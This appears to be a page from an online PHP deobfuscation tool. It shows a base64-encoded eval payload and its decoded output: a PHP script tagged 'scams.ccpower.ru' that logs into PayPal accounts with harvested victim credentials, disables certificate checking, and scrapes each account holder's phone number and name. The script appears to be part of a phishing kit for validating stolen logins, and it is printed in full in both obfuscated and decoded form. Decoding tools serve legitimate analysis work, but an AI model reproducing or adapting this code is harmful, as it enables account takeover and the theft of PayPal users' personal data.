Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php eval("?>".base64_decode("PD9waHANCi8vICAgICAgICAgICsrKysrKysrKysrKysrKysrKysrKysrKys..
Decoded Output download
?>b'<?php
// ++++++++++++++++++++++++++++++++++++++++++++++++++++++
// scams.ccpower.ru
// ++++++++++++++++++++++++++++++++++++++++++++++++++++++
error_reporting(0);
$verify=0;
$random=rand(1, 100000);
$cookie=$random . ".php";
$agent="Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.1)";
function doRequest($method, $url, $referer, $agent, $cookie, $vars) {
$ch=curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
if($referer != "") {
curl_setopt($ch, CURLOPT_REFERER, $referer);
}
curl_setopt($ch, CURLOPT_USERAGENT, $agent);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookie);
if ($method == \'POST\') {
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $vars);
}
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 1);
$data = curl_exec($ch);
curl_close($ch);
if (strstr($url, "https://www.paypal.com/cgi-bin/webscr?cmd=_login-submit&dispatch=")) {
if($data == 1)
$data = "oooo_login-doneooooooo";
}
if ($data) {
return $data;
} else {
return curl_error($ch);
}
}
function get($url, $referer, $agent, $cookie) {
return doRequest(\'GET\', $url, $referer, $agent, $cookie, \'NULL\');
}
function post($url, $referer, $agent, $cookie, $vars) {
return doRequest(\'POST\', $url, $referer, $agent, $cookie, $vars);
}
$referer=\'https://www.paypal.com\';
$url=\'https://www.paypal.com/cgi-bin/webscr?cmd=_login-run\';
$str=get($url, $referer, $agent, $cookie);
$dispatch=substr($str,strpos($str,"dispatch=")+9,500);
$dispatch=substr($dispatch,0,strpos($dispatch,"\""));
$referer=\'https://www.paypal.com/webscr?cmd=_login-run\';
$url=\'https://www.paypal.com/cgi-bin/webscr?cmd=_login-submit&dispatch=\'.$dispatch;
$vars=\'login_email=\'.urlencode($user).\'&login_password=\'.urlencode($pass).\'&submit.x=Log+In&form_charset=UTF-8&browser_name=Firefox&browser_version=2&operating_system=Windows&fso=6TKIjePwrXPDOs8XsYIiJ9_sWhM4HmYH8eAJY4fESTikiJK1bt_Q9EdQeFJ0EITF_u1-vW&mid_profile=\';
$str=post($url . \'&\' . $vars, $referer, $agent, $cookie, \'\');
$page=0;
$sec=0;
if (strstr($str,"nirvana?cmd=_login-submit")){
$signerr=1;
}
if ($signerr=="0"){
//$referer=\'https://www.paypal.com/\';
//$url=\'https://www.paypal.com/cgi-bin/webscr\';
//$vars=\'cmd=_profile-credit-card-new\';
//$str=post($url, $referer, $agent, $cookie, $vars);
$referer=\'https://www.paypal.com/\';
$url=\'https://www.paypal.com/us/cgi-bin/webscr\';
$vars=\'cmd=_profile-phone\';
$str=post($url, $referer, $agent, $cookie, $vars);
$userphone=substr($str, strpos($str, \'checked name="phone"\')+1,500);
$userphone=substr($userphone, strpos($userphone, \'">\')+2,400);
$userphone=substr($userphone, 0, strpos($userphone, \'<\'));
$_SESSION[\'phone\'] = $userphone;
$referer=\'https://www.paypal.com/\';
$url=\'https://www.paypal.com/cgi-bin/webscr\';
$vars=\'cmd=_profile-credit-card-new-clickthru&flag_from_creditcard_details=1&add.x=Add\';
$str=post($url, $referer, $agent, $cookie, $vars);
$firstname=substr($str, strpos($str, \'first_name" value="\')+19,40);
$firstname=substr($firstname, 0, strpos($firstname, \'">\'));
$lastname=substr($str, strpos($str, \'last_name" value="\')+18,40);
$lastname=substr($lastname, 0, strpos($lastname, \'">\'));
$_SESSION[\'firstname\'] = $firstname;
$_SESSION[\'lastname\'] = $lastname;
}
@unlink($cookie);
?>
'
Did this file decode correctly?
Original Code
<?php eval("?>".base64_decode("PD9waHANCi8vICAgICAgICAgICsrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKw0KLy8gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2NhbXMuY2Nwb3dlci5ydSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgDQovLyAgICAgICAgICArKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysrKysNCmVycm9yX3JlcG9ydGluZygwKTsNCiR2ZXJpZnk9MDsNCg0KJHJhbmRvbT1yYW5kKDEsIDEwMDAwMCk7DQokY29va2llPSRyYW5kb20gLiAiLnBocCI7DQokYWdlbnQ9Ik1vemlsbGEvNS4wIChXaW5kb3dzOyBVOyBXaW5kb3dzIE5UIDUuMTsgZW4tVVM7IHJ2OjEuOC4xLjEpIjsNCg0KZnVuY3Rpb24gZG9SZXF1ZXN0KCRtZXRob2QsICR1cmwsICRyZWZlcmVyLCAkYWdlbnQsICRjb29raWUsICR2YXJzKSB7DQogICAgJGNoPWN1cmxfaW5pdCgpOw0KICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9VUkwsICR1cmwpOw0KICAgIGlmKCRyZWZlcmVyICE9ICIiKSB7DQoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1JFRkVSRVIsICRyZWZlcmVyKTsNCiAgICB9DQogICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1VTRVJBR0VOVCwgJGFnZW50KTsNCiAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfRk9MTE9XTE9DQVRJT04sIDEpOw0KICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7DQogICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0NPT0tJRUpBUiwgJGNvb2tpZSk7DQogICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX0NPT0tJRUZJTEUsICRjb29raWUpOw0KICAgIGlmICgkbWV0aG9kID09ICdQT1NUJykgew0KICAgICAgICBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUE9TVCwgMSk7DQogICAgICAgIGN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9QT1NURklFTERTLCAkdmFycyk7DQogICAgfQ0KCQ0KCWN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9TU0xfVkVSSUZZUEVFUiwgMCk7DQoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1NTTF9WRVJJRllIT1NULCAxKTsNCiAgICANCgkkZGF0YSA9IGN1cmxfZXhlYygkY2gpOw0KCQ0KICAgIGN1cmxfY2xvc2UoJGNoKTsNCgkNCglpZiAoc3Ryc3RyKCR1cmwsICJodHRwczovL3d3dy5wYXlwYWwuY29tL2NnaS1iaW4vd2Vic2NyP2NtZD1fbG9naW4tc3VibWl0JmRpc3BhdGNoPSIpKSB7DQoJaWYoJGRhdGEgPT0gMSkgDQoJJGRhdGEgPSAib29vb19sb2dpbi1kb25lb29vb29vbyI7DQoJfQ0KDQogICAgaWYgKCRkYXRhKSB7DQogICAgICAgIHJldHVybiAkZGF0YTsNCiAgICB9IGVsc2Ugew0KICAgICAgICByZXR1cm4gY3VybF9lcnJvcigkY2gpOw0KICAgIH0NCn0NCg0KZnVuY3Rpb24gZ2V0KCR1cmwsICRyZWZlcmVyLCAkYWdlbnQsICRjb29raWUpIHsNCiAgICByZXR1cm4gZG9SZXF1ZXN0KCdHRVQnLCAkdXJsLCAkcmVmZXJlciwgJGFnZW50LCAkY29va2llLCAnTlVMTCcpOw0KfQ0KDQpmdW5jdGlvbiBwb3N0KCR1cmwsICRyZWZlcmVyLCAkYWdlbnQsICRjb29raWUsICAkdmFycykgew0KICAgIHJldHVybiBkb1JlcXVlc3QoJ1BPU1QnLCAkdXJsLCAkcmVmZXJlciwgJGFnZW50LCAkY29va2llLCAkdmFycyk7DQp9DQoNCiRyZWZlcmVyPSdodHRwczovL3d3dy5wYXlwYWwuY29tJzsNCiR1cmw9J2h0dHBzOi8vd3d3LnBheXBhbC5jb20vY2dpLWJpbi93ZWJzY3I/Y21kPV9sb2dpbi1ydW4nOw0KJHN0cj1nZXQoJHVybCwgJHJlZmVyZXIsICRhZ2VudCwgJGNvb2tpZSk7DQokZGlzcGF0Y2g9c3Vic3RyKCRzdHIsc3RycG9zKCRzdHIsImRpc3BhdGNoPSIpKzksNTAwKTsNCiRkaXNwYXRjaD1zdWJzdHIoJGRpc3BhdGNoLDAsc3RycG9zKCRkaXNwYXRjaCwiXCIiKSk7DQokcmVmZXJlcj0naHR0cHM6Ly93d3cucGF5cGFsLmNvbS93ZWJzY3I/Y21kPV9sb2dpbi1ydW4nOw0KJHVybD0naHR0cHM6Ly93d3cucGF5cGFsLmNvbS9jZ2ktYmluL3dlYnNjcj9jbWQ9X2xvZ2luLXN1Ym1pdCZkaXNwYXRjaD0nLiRkaXNwYXRjaDsNCiR2YXJzPSdsb2dpbl9lbWFpbD0nLnVybGVuY29kZSgkdXNlcikuJyZsb2dpbl9wYXNzd29yZD0nLnVybGVuY29kZSgkcGFzcykuJyZzdWJtaXQueD1Mb2crSW4mZm9ybV9jaGFyc2V0PVVURi04JmJyb3dzZXJfbmFtZT1GaXJlZm94JmJyb3dzZXJfdmVyc2lvbj0yJm9wZXJhdGluZ19zeXN0ZW09V2luZG93cyZmc289NlRLSWplUHdyWFBET3M4WHNZSWlKOV9zV2hNNEhtWUg4ZUFKWTRmRVNUaWtpSksxYnRfUTlFZFFlRkowRUlURl91MS12VyZtaWRfcHJvZmlsZT0nOw0KJHN0cj1wb3N0KCR1cmwgLiAnJicgLiAkdmFycywgJHJlZmVyZXIsICRhZ2VudCwgJGNvb2tpZSwgICcnKTsNCg0KDQokcGFnZT0wOw0KJHNlYz0wOw0KDQoNCmlmIChzdHJzdHIoJHN0ciwibmlydmFuYT9jbWQ9X2xvZ2luLXN1Ym1pdCIpKXsNCiAgJHNpZ25lcnI9MTsNCg0KfQ0KDQppZiAoJHNpZ25lcnI9PSIwIil7DQoNCi8vJHJlZmVyZXI9J2h0dHBzOi8vd3d3LnBheXBhbC5jb20vJzsNCi8vJHVybD0naHR0cHM6Ly93d3cucGF5cGFsLmNvbS9jZ2ktYmluL3dlYnNjcic7DQovLyR2YXJzPSdjbWQ9X3Byb2ZpbGUtY3JlZGl0LWNhcmQtbmV3JzsNCi8vJHN0cj1wb3N0KCR1cmwsICRyZWZlcmVyLCAkYWdlbnQsICRjb29raWUsICAkdmFycyk7DQoNCiRyZWZlcmVyPSdodHRwczovL3d3dy5wYXlwYWwuY29tLyc7DQokdXJsPSdodHRwczovL3d3dy5wYXlwYWwuY29tL3VzL2NnaS1iaW4vd2Vic2NyJzsNCiR2YXJzPSdjbWQ9X3Byb2ZpbGUtcGhvbmUnOw0KJHN0cj1wb3N0KCR1cmwsICRyZWZlcmVyLCAkYWdlbnQsICRjb29raWUsICR2YXJzKTsNCiR1c2VycGhvbmU9c3Vic3RyKCRzdHIsIHN0cnBvcygkc3RyLCAnY2hlY2tlZCBuYW1lPSJwaG9uZSInKSsxLDUwMCk7DQokdXNlcnBob25lPXN1YnN0cigkdXNlcnBob25lLCBzdHJwb3MoJHVzZXJwaG9uZSwgJyI+JykrMiw0MDApOw0KJHVzZXJwaG9uZT1zdWJzdHIoJHVzZXJwaG9uZSwgMCwgc3RycG9zKCR1c2VycGhvbmUsICc8JykpOw0KDQokX1NFU1NJT05bJ3Bob25lJ10gPSAgJHVzZXJwaG9uZTsNCg0KJHJlZmVyZXI9J2h0dHBzOi8vd3d3LnBheXBhbC5jb20vJzsNCiR1cmw9J2h0dHBzOi8vd3d3LnBheXBhbC5jb20vY2dpLWJpbi93ZWJzY3InOw0KJHZhcnM9J2NtZD1fcHJvZmlsZS1jcmVkaXQtY2FyZC1uZXctY2xpY2t0aHJ1JmZsYWdfZnJvbV9jcmVkaXRjYXJkX2RldGFpbHM9MSZhZGQueD1BZGQnOw0KJHN0cj1wb3N0KCR1cmwsICRyZWZlcmVyLCAkYWdlbnQsICRjb29raWUsICAkdmFycyk7DQoNCiRmaXJzdG5hbWU9c3Vic3RyKCRzdHIsIHN0cnBvcygkc3RyLCAnZmlyc3RfbmFtZSIgdmFsdWU9IicpKzE5LDQwKTsNCiRmaXJzdG5hbWU9c3Vic3RyKCRmaXJzdG5hbWUsIDAsIHN0cnBvcygkZmlyc3RuYW1lLCAnIj4nKSk7DQoNCiRsYXN0bmFtZT1zdWJzdHIoJHN0ciwgc3RycG9zKCRzdHIsICdsYXN0X25hbWUiIHZhbHVlPSInKSsxOCw0MCk7DQokbGFzdG5hbWU9c3Vic3RyKCRsYXN0bmFtZSwgMCwgc3RycG9zKCRsYXN0bmFtZSwgJyI+JykpOw0KDQoNCiRfU0VTU0lPTlsnZmlyc3RuYW1lJ10gPSAgJGZpcnN0bmFtZTsNCiRfU0VTU0lPTlsnbGFzdG5hbWUnXSA9ICAkbGFzdG5hbWU7DQoNCn0NCkB1bmxpbmsoJGNvb2tpZSk7DQo/Pg0K")); ?>
Function Calls
base64_decode | 1 |
Stats
MD5 | 4851d37e487343da4cfb1d1e79c51525 |
Eval Count | 1 |
Decode Time | 217 ms |